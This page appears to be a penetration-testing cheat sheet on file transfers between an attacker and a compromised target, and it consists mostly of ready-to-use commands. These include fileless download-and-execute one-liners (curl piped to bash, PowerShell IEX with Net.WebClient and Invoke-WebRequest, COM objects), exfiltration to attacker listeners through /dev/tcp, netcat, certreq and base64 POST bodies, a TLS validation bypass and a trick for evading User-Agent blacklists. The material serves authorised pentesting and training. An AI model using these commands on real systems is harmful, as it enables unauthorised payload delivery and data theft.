💥Cyb3rBook

FILE TRANSFERS

6 min read

PRIMARY CATEGORY → PENTESTING ROOT

Living off The Land Binaries

RESOURCESFILTERS
LOLBAS/download
/upload		See here
GTFOBins+file download
+file upload		See here

File Transfer Servers

TCP
Netcat
nc -nlvp <PORT> > <FILE>
nc -nlvp <PORT> < <FILE>
Ncat
ncat -nlvp <PORT> --recv-only > <FILE>
ncat -nlvp <PORT> --send-only < <FILE>
HTTP
Simple HTTP Servers

Reference

  • Python3
python3 -m http.server <PORT>
  • Python2.7
python2.7 -m SimpleHTTPServer <PORT>
  • NodeJS
npx http-server <DIRECTORY> -o -p 1234
  • PHP
php -S 0.0.0.0:1234
  • Ruby
ruby -run -ehttpd . -p<PORT>
HTTP Server for Uploads
  • Python3

Reference

python3 -m venv venv
source !$/bin/activate
pip3 install uploadserver
python3 -m uploadserver <PORT>
SMB
Smbserver (Impacket)

Reference

smbserver.py -smb2support -username <USER> -password <PASSWORD> <SHARE_NAME> <SHARE_PATH>
FTP
python3 -m venv venv
source !$/bin/activate
pip3 install pyftpdlib
python3 -m pyftpdlib --port 21 --write

--write option allows FTP Client uploads

Linux File Transfer Agents

TCP
Netcat
nc -q 0 <TARGET> <PORT> < <FILE>
Ncat
ncat --send-only <TARGET> <PORT> < <FILE>
Cat + Bash /dev/tcp
bash -c 'cat <FILE> > /dev/tcp/<TARGET>/<PORT>'
HTTP
Wget
  • Same Name as Origin
wget <URL>
  • Different Name as Origin
wget --output-document "<URL>" # Long Format
wget -O "<URL>" # Short Format
Curl
  • Same Name as Origin
curl --silent --request GET --location --remote-name "<URL>" # Long Format
curl -sX GET -LO "<URL>" # Short Format
  • Different Name as Origin
curl --silent --request GET --location --output "<FILE>" "<URL>" # Long Format
curl -sX GET -Lo "<FILE>" "<URL>" # Short Format
  • Fileless
bash
curl --silent --request GET --location "http[s]://<TARGET>:<PORT>/<FILE>.bash" | bash
python
curl --silent --request GET --location "http[s]://<TARGET>:<PORT>/<FILE>.py" | python3
  • Upload Files to a Web Server

First, build the HTTP Server for Uploads

curl --silent --location --request POST --insecure --form 'files=@<FILE>' 'http[s]://<TARGET>:<PORT>/upload'
Bash /dev/tcp
exec 3<> /dev/tcp/<IP_ADDRESS>/<PORT>
printf "GET /<FILE> HTTP/1.1\n\n" >&3
cat <&3 > <FILE>
Python
  • Python3
python3 -c 'import urllib.request; urllib.request.urlretrieve("<URL>", "<OUTPUT_FILE>")'
  • Python2.7
python2.7 -c 'import urllib; urllib.urlretrieve ("<URL>", "<OUTPUT_FILE>")'
  • Upload Files to a Web Server

First, build the HTTP Server for Uploads

python3 -c 'import requests; requests.post("<URL>",files={"files":open("<FILE>","rb")})'
PHP
  • file_get_contents() + file_put_contents()
php -r '$file = file_get_contents("<URL>"); file_put_contents("<OUTPUT_FILE>",$file);'
  • fopen()
php -r 'const BUFFER = 1024; $fremote =  fopen("<URL>", "rb"); $flocal = fopen("<OUTPUT_FILE>", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
  • Fileless
bash
php -r '$lines = @file("<URL>"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby
ruby -e 'require "net/http"; File.write("<OUTPUT_FILE>", Net::HTTP.get(URI.parse("<URL>")))'
Perl
perl -e 'use LWP::Simple; getstore("<URL>", "<OUPUT_FILE>");'
SSH

If SSH access to the target is available, proceed as follows →

SFTP
Attacker
scp -P<PORT> /path/to/local/resource <USER>@<TARGET>:/destination/path
SCP
Attacker
sftp -P<PORT> <USER>@<TARGET>
Target
cd /destination/path # Remote Path
put /path/to/local/resource
exit
FTP
FTP
ftp <FTP_SERVER>
LFTP
  • Interactive
lftp -u <USER>,<PASSWORD> <FTP_SERVER>
  • Non-Interactive
lftp -u <USER>,<PASSWORD> <FTP_SERVER> -e '<FTP_COMMANDS>; bye'
TLS
OpenSSL

Reference

  • From the Attacker ⚔️
openssl req -x509 -newkey rsa:4096 -noenc -keyout key.pem -out cert.pem -days 365
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT> < <FILE>
  • From the Target 🎯
openssl s_client -quiet -connect <ATTACKER>:<PORT> > <OUTPUT_FILE>
Base64

Man Page

Encode the file content to Base64
Attacker
base64 -w 0 <INPUT_FILE>
Decode the Base64 string
base64 -d <<< "BASE64_STRING" > <OUTPUT_FILE>
File Transfer Validation
Check File Type transferred
file <FILE>
Check File Integrity

Run this command on both the Attacker and the Target Hosts

md5sum <FILE>
sha256sum <FILE>
sha512sum <FILE>

Windows File Transfer Agents

HTTP

Harmj0y

Certutil.exe

Reference

  • Download File
certutil.exe -urlcache -split -f '<URL>' '<OUTPUT_FILE>'
certutil.exe -verifyctl -split -f '<URL' '<OUTPUT_FILE>'
WinHTTPRequest

COM

  • Fileless
$r = New-Object -ComObject WinHTTP.WinHTTPRequest.5.1
$r.open('GET', '<URL>', $false)
$r.send()
IEX $r.ResponseText
MSXML2

COM

  • Fileless
$r = New-Object -ComObject msxml2.XMLHTTP
$r.open('GET', '<URL>', $false)
$r.send()
IEX $r.ResponseText
Invoke-WebRequest

PS v3.0 >

  • Download File
IWR -UseBasicParsing -Uri '<URL>' -OutFile '.\<OUTPUT_FILE>' # Or Invoke-WebRequest
  • Fileless
IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest <ARGS>)
  • SSL/TLS Certificate Validation Bypass
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  • User-Agent Blacklist Bypass

List all standard User-Agents as follows

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Set one of the above UA as value for the -UserAgent parameter of Invoke-WebRequest

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome # Chrome User-Agent
IEX (IWR -UseBasicParsing -Uri '<URL>' -UserAgent $UserAgent)
Invoke-RestMethod

PS v3.0 >

  • Download File
IRM -RestMethod -UseBasicParsing -Uri '<URL>' -OutFile '<OUTPUT_FILE>'
  • Fileless
IEX (IRM -UseBasicParsing -Uri '<URL>')
Net.WebClient

.NET

  • Download File
(New-Object Net.WebClient).DownloadString('<URL>') > .\<FILE>
(New-Object Net.WebClient).DownloadFile('<URL>', '<OUTPUT_FILE>')
(New-Object Net.WebClient).DownloadFileAsync('<URL>', '<OUTPUT_FILE>')
  • Fileless
IEX (New-Object Net.WebClient).DownloadString('<URL>')
(New-Object Net.WebClient).DownloadString('<URL>') | IEX
PSUpload.ps1

Reference

First, build the HTTP Server for Uploads

  • Download and Run Powershell Module for Web Uploads
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1')
  • Upload a File to the HTTP Upload Server
Invoke-FileUpload -Uri 'http://<TARGET>:<PORT>/upload' -File '<LOCAL_FILE_TO_UPLOAD>' # File's Full Path
Invoke-WebRequest + Base64-Encoded HTTP POST Body
  • From the Attacker ⚔️
nc -nlvp 443
  • From The Target 🎯
Invoke-WebRequest -UseBasicParsing -Uri 'http://<TARGET>:<PORT>' -Method POST -Body ([Convert]::toBase64String([System.IO.File]::ReadAllBytes(<FILE>))) # File's Full Path
Certreq.exe

Reference I    •    Reference II

  • Upload a File Content via the body of a POST HTTP Request
Attacker
nc -nlvp <PORT>
Target
certreq.exe -Post -config http[s]://<ATTACKER_IP>:<PORT>/ <LOCAL_FILE>
BITS

Reference

  • Bitsadmin.exe
bitsadmin.exe /transfer wcb /priority foreground "http://<ATTACKER_IP>:<PORT>/<RESOURCE>" "<OUTPUT_FILE>" # File's Full Path
  • Powershell
Import-Module bitstransfer ; Start-BitsTransfer -Source "http://<ATTACKER_IP>:<PORT>/<RESOURCE>" -Destination "<OUTPUT_FILE>" # File's Full Path
SMB

First, an SMB Server has to be deployed at one of the endpoints

Net use

CMD & PS

net use <NETWORK_DRIVE_LETTER> \\<ATTACKER>\<SHARE_NAME> /USER:<USER> <PASSWORD>
New-PSDrive

PS

$Passwd = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$Cred = New-Object PSCredential("<USER>", $Passwd)
New-PSDrive -Name <NAME> -PSProvider FileSystem -Root "\\<ATTACKER>\<SHARE_NAME>" -Credential $Cred
FTP
Net.WebClient

First build a FTP Server

  • Download File
(New-Object Net.WebClient).DownloadFile('ftp://<FTP_SERVER>/<FILE>', '<OUTPUT_FILE>')
  • Upload File
(New-Object Net.WebClient).UploadFile('ftp://<FTP_SERVER>/<UPLOAD_PATH>', '<FILE>') # File's Full Path
RDP

Network Path of the Shared Folder via RDP → \\tsclient\linux

RDesktop
rdesktop <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -r disk:linux='<LOCAL_FOLDER>'
XFreeRDP
xfreerdp /v:<TARGET> /d:<DOMAIN> /u:<USER> /p:'<PASSWORD>' /drive:linux,<LOCAL_FOLDER>
Powershell
Powershell Sessions (WinRM)

The current user must have administrator rights on the remote machine or belong to the Remote Managements Users Group

In addition, ports 5985 or 5986 related to WinRM must be open

  • Powershell Session Creation
$Session = New-PSSession -ComputerName <TARGET>
  • Copy a file from Localhost to the Remote Machine Session
Copy-Item -Path "<LOCAL_FILE>" -ToSession $Session -Destination "<REMOTE_PATH>"
  • Copy a file from the Remote Machine Session to the Localhost
Copy-Item -Path "<REMOTE_FILE>" -Destination "<LOCAL_PATH>" -FromSession $Session
Base64
Encode the file content to Base64
  • Powershell (.NET)

PS

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("<INPUT_FILE_PATH>")) # File's Full Path
  • Certutil.exe

CMD & PS

certutil.exe -encode <INPUT_FILE> <OUTPUT_FILE>
Decode the Base64 string
  • Linux 🐧
base64 -d <<< "BASE64_STRING" > /destination/path
  • Windows 🪟
[System.IO.File]::WriteAllBytes("<OUTPUT_FILE_PATH>", [System.Convert]::FromBase64String((Get-Content "<BASE64_FILE_PATH>" -Raw)))
File Transfer Validation

Run this command on both the Attacker and the Target Hosts

Get-FileHash
Get-FileHash -Algorithm MD5 <FILE> | Select-Object -Property Hash
Get-FileHash -Algorithm SHA256 <FILE> | Select-Object -Property Hash
Get-FileHash -Algorithm SHA512 <FILE> | Select-Object -Property Hash
Certutil.exe
certutil.exe -hashfile <FILE> MD5
certutil.exe -hashfile <FILE> SHA256
certutil.exe -hashfile <FILE> SHA512

Graph View

Backlinks